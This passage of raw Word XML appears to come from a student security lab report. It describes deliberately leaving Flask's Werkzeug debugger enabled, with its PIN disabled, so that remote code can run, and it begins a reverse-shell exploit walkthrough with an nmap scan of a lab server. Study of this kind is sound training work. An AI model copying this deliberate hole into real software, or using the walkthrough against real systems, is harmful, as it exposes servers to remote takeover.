            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="597C66AA" w14:textId="4FFBA72B" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00DF7185" w:rsidP="00C84C06">
      <w:hyperlink r:id="rId122" w:history="1">
        <w:r w:rsidR="00C84C06" w:rsidRPr="00C84C06">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://medium.com/swlh/hacking-flask-applications-939eae4bffed</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="147B5EC1" w14:textId="77777777" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C84C06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SUGGESTED IMPLEMENTATION METHOD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEEC12B" w14:textId="3AC5290D" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve">When developing the app.wsgi that is used </w:t>
      </w:r>
      <w:r w:rsidR="00910C41">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> the Apache server configuration file to run the flask application</w:t>
      </w:r>
      <w:r w:rsidR="00910C41">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> the Werkzeug debugger can be imported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71756B28" w14:textId="614011A9" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve">The developer will use the debugging console feature to </w:t>
      </w:r>
      <w:r w:rsidR="00910C41">
        <w:t>give</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> detail</w:t>
      </w:r>
      <w:r w:rsidR="00910C41">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> traceback of possible code that is </w:t>
      </w:r>
      <w:r w:rsidR="00910C41">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t>conflict with the new deployed server environment</w:t>
      </w:r>
      <w:r w:rsidR="00910C41">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00910C41">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t>he debugger security pin can be disabled to allow quicker testing on the website</w:t>
      </w:r>
      <w:r w:rsidR="00910C41">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> changing </w:t>
      </w:r>
      <w:r w:rsidR="00910C41">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve">value of code where needed and </w:t>
      </w:r>
      <w:r w:rsidR="00910C41">
        <w:t>gi</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t>ve real time feedback</w:t>
      </w:r>
      <w:r w:rsidR="00910C41">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00910C41">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="_Hlk97762481"/>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve">Werkzeug debugger </w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidRPr="00C84C06">
        <w:t>is a great tool to analyse the error code and quickly</w:t>
      </w:r>
      <w:r w:rsidR="00910C41" w:rsidRPr="00910C41">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00910C41" w:rsidRPr="00C84C06">
        <w:t>test</w:t>
      </w:r>
      <w:r w:rsidR="00910C41">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> identify, and </w:t>
      </w:r>
      <w:r w:rsidR="00457DCA">
        <w:t>amend</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> possible issues within the web application rather than having a generic internal server error message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409CC3E2" w14:textId="7490CF12" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve">However, since the debugger is executed in browser and can be accessed by anyone, if left unprotected </w:t>
      </w:r>
      <w:r w:rsidR="00457DCA">
        <w:t xml:space="preserve">this </w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t>can lead to arbitrary code execution allowing a reverse shell connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591393BC" w14:textId="56BD442C" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42CEB2D2" wp14:editId="2CFBE642">
            <wp:extent cx="4686300" cy="1473200"/>
            <wp:effectExtent l="0" t="0" r="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medium confide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86300" cy="1473200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F177CF2" w14:textId="7E6216A9" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve">The console has been accessed with the browser by a remote user that was able to execute python code on the webserver machine, in the example below the hacker used the console to print on screen Hello World, however the console can be </w:t>
      </w:r>
      <w:r w:rsidR="00457DCA" w:rsidRPr="00C84C06">
        <w:t>used</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> for more dangerous purpose</w:t>
      </w:r>
      <w:r w:rsidR="00457DCA">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> such as creat</w:t>
      </w:r>
      <w:r w:rsidR="00457DCA">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> a reverse shell connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23212E1A" w14:textId="4598301C" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EAEFD9F" wp14:editId="7FD91218">
            <wp:extent cx="5727700" cy="2349500"/>
            <wp:effectExtent l="0" t="0" r="635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27700" cy="2349500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF25B49" w14:textId="77777777" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C84C06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FUNCTIONALITY TESTING:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CF0022" w14:textId="61A39D78" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t>The debugger is not affecting whatsoever the functionality of the website, a regular client</w:t>
      </w:r>
      <w:r w:rsidR="00457DCA">
        <w:t>/user</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> would not note any difference </w:t>
      </w:r>
      <w:r w:rsidR="00457DCA">
        <w:t>regarding</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> the site operation and performance, the debugger is </w:t>
      </w:r>
      <w:r w:rsidR="00457DCA" w:rsidRPr="00C84C06">
        <w:t>initiated</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> only by server error or accessing the console path </w:t>
      </w:r>
      <w:r w:rsidR="00457DCA">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t>/console</w:t>
      </w:r>
      <w:r w:rsidR="00457DCA">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5744D7AA" w14:textId="77777777" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t>A customer can still access the website, login, place order, making payment everything without noticing that the debugger feature is enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07128142" w14:textId="0A40F27E" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A44710F" wp14:editId="10222DBA">
            <wp:extent cx="5727700" cy="2660650"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="11" name="Picture 1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 application, website&#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7700" cy="2660650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF5750D" w14:textId="77777777" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t>For this reason, some inexperienced web development leaves the debugger enabled in production environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429856C7" w14:textId="77777777" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C84C06">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OUTCOME:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6945EF3A" w14:textId="519E248A" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t>The Implementation of the debugging console was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF7633B" w14:textId="77777777" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t>The Werkzeug debugger, allows the user to log errors in the /var/apache2/log.error file and return an interactive console for the administrator of the page to troubleshooting possible server error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA69C22" w14:textId="7A41B273" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t>The console is accessible via browser withing the local machine and remotely, allow</w:t>
      </w:r>
      <w:r w:rsidR="00457DCA">
        <w:t>s for</w:t>
      </w:r>
      <w:r w:rsidRPr="00C84C06">
        <w:t xml:space="preserve"> python code execution and traceback feature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C0AC0D" w14:textId="0913D7A0" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EB24468" wp14:editId="5C176894">
            <wp:extent cx="5734050" cy="2927350"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="10" name="Picture 1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email&#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050" cy="2927350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B95578B" w14:textId="77777777" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t>The debugger allows to execute code also when an error is generated, to show part of the code where the error occurred, code line and all the library dependency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4C7432" w14:textId="7995186F" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77F74290" wp14:editId="601DFD8E">
            <wp:extent cx="5734050" cy="339725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4050" cy="3397250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F127004" w14:textId="77777777" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:t>The error is also logged in the Apache error.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716018B9" w14:textId="183B2BE9" w:rsidR="00C84C06" w:rsidRPr="00C84C06" w:rsidRDefault="00C84C06" w:rsidP="00C84C06">
      <w:r w:rsidRPr="00C84C06">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63C18705" wp14:editId="3C9416CB">
            <wp:extent cx="6645910" cy="1706880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="762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45910" cy="1706880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="623D6C7B" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C6D7143" w14:textId="77777777" w:rsidR="00457DCA" w:rsidRDefault="00457DCA" w:rsidP="00B90A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="691C744B" w14:textId="1D7A49B2" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00457DCA" w:rsidP="00B90A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">REVERSE SHELL </w:t>
      </w:r>
      <w:r w:rsidR="00B90A7E" w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">VULNERABILITY/EXPLOIT WALKTHROUGH </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D551445" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TOOLS REQUIRED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F79DAB" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve">List of the specific required tools/applications for completion of the exploit. Include all tools from discovery – access. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6873AE" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00457DCA" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457DCA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A836B" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve">Nmap is a network scanner and security auditing tool, it is used to probe the network and map the device present in the LAN, this tool also detected services in use and OS information of those by devices available in a network. The nmap tool is used for active reconnaissance of the e-commerce webserver, the server has a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B90A7E">
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve"> kernel and the OS detected is ubuntu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29009C54" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E"/>
    <w:p w14:paraId="177A111E" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00457DCA" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457DCA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EF7421" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>Metasploit is a security framework use to perform exploitation of the found vulnerabilities, Metasploit have a database of exploitable modules that can be expand with by importing others external module. With the use of searchsploit its possible to discover module and payload that can be used to exploit specific vulnerabilities. Each module has different set of option and payload, once the target and the require configuration are set, the exploitation can begin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D46F3B9" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00457DCA" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00457DCA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Netcat </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6600E2F6" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0FE0A4" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B29D549" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00DF7185" w:rsidP="00B90A7E">
      <w:hyperlink r:id="rId129" w:history="1">
        <w:r w:rsidR="00B90A7E" w:rsidRPr="00B90A7E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nmap.org/ncat/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4EE825F7" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00DF7185" w:rsidP="00B90A7E">
      <w:hyperlink r:id="rId130" w:history="1">
        <w:r w:rsidR="00B90A7E" w:rsidRPr="00B90A7E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.metasploit.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B054368" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00DF7185" w:rsidP="00B90A7E">
      <w:hyperlink r:id="rId131" w:history="1">
        <w:r w:rsidR="00B90A7E" w:rsidRPr="00B90A7E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nmap.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61F365CC" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E"/>
    <w:p w14:paraId="5195263D" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>METHODS UTILIZED:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F47D7D" w14:textId="38BCBF98" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:t xml:space="preserve">From the kali machine the scan of the webserver is performed to check which services are available on the WebServer, detecting operating system, open ports and services version. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4508"/>
        <w:gridCol w:w="4508"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w14:paraId="17345F22" w14:textId="77777777" w:rsidTr="00B90A7E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F7F07D7" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>Command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="575C9E5E" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
            <w:pPr>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00B90A7E">
              <w:t>sudo nmap -sV -O 192.168.15.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F324CCE" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B9502E" w14:textId="7E4DF421" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36E9B22B" wp14:editId="263C9C89">
            <wp:extent cx="5734050" cy="1911350"/>
            <wp:effectExtent l="0" t="0" r="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4050" cy="1911350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B45CA47" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00B90A7E">
      <w:r w:rsidRPr="00B90A7E">
        <w:lastRenderedPageBreak/>
        <w:t>From a quick scan it has been possible to retrieve the following information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6DF044" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00151E57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90A7E">
        <w:t>At the time of the scan the web server had bot port 80/443 open</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A73EE3" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00151E57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B90A7E">
        <w:t>The server OS is an Ubuntu running Linux Kernel 4.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662470AA" w14:textId="77777777" w:rsidR="00B90A7E" w:rsidRPr="00B90A7E" w:rsidRDefault="00B90A7E" w:rsidP="00151E57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
